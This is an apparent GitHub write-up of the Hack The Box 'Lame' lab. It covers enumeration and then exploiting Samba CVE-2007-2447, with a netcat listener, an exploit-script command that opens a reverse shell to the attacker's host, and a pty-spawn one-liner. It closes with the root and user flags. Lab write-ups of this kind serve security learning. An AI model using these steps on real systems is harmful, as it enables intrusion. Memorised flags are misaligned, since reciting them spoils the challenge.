Skip to content

Latest commit

 

History

History
202 lines (107 loc) · 5.3 KB

README.md

File metadata and controls

202 lines (107 loc) · 5.3 KB
Raw

Lame

Write-up author: jon-brandy

DESCRIPTION:

  • NONE

HINT:

  • NONE

STEPS:

  1. First, run nmap to the machine's host, so we can see all open ports and the service's running.
nmap -p- -sV -O -sVC 10.10.10.3

RESULT

image

image

  1. Notice there's 2 ports that might be running some type of network shares. Not only that, we're allowed to login in ftp as anonymous.

image

image

  1. Now let's login with ftp.

RESULT

image

  1. Let's check are there any files or directories.

RESULT

image

  1. Got nothing.
  2. Now let's do SMB enumeration.
smbmap -H 10.10.10.3

RESULT

image

  1. Notice there's 2 different directories than the others -> tmp, opt (doesn't have any dollar sign).

image

NOTES:

tmp and opt doesn't have any dollar sign, means it can be accessed by regular use privileges.
  1. Since only tmp directory with permissions to read and write, means tmp shall be our interest now. But the problem is we don't have any user credentials for this tmp directory.
  2. Even though it's open here, but still we need user credentials to login to it.
  3. Now let's use search split to potentially see if there's an exploit associated with the service version of samba that's running on this machine.

RESULT

searchsploit samba 3.0.2

image

  1. Based from the first output.

image

  1. We can use metasploit, but let's not use that tools, we want to dive in manually, let's start by find where this exploit stored on our kali linux (THE CVE NUMBER).

image

RESULT

cat /usr/share/exploitdb/exploits/unix/remote/16320.rb | grep CVE

image

  1. Let's jump to the url given.

RESULT

image

image

  1. Based on the samba documentation, we know that there's a configuration option which is not enabled by default and it can lead to RCE.
  2. Anyway when searched the CVE number at google, i found this github repository.
https://github.com/amriunix/CVE-2007-2447
  1. Before run the script, run nc -nlvp 4444 so we can grab the reverse shell spawned by listening.
  2. Next run this payload:
python3 usermap_script.py 10.10.10.3 139 10.10.14.4 4444

RESULT

image

image

  1. Let's type id and whoami.

RESULT

image

  1. We are root, that's great! We don't need privilege escalation then to solve this challenge.
  2. The next thing to do now is to stabilize our shell first.
  3. Let's run this python command:
python -c 'import pty; pty.spawn("/bin/sh")'

RESULT

image

  1. Now let's list all files or directories inside the machine.

RESULT

image

  1. Jump to the root directory.

INSIDE

image

  1. Cat the root.txt file.

RESULT

image

  1. Got the flag!

FLAG

46b24a994e2c264192df7f7c060f1fdd

GET THE USER.TXT FILE

  1. Simply go to home directory. Then go to makis.

RESULT

image

  1. Cat the .txt file.

RESULT

image

  1. User owned!

USER

f6b0bf444d16b49c167fffea3e7a9f5a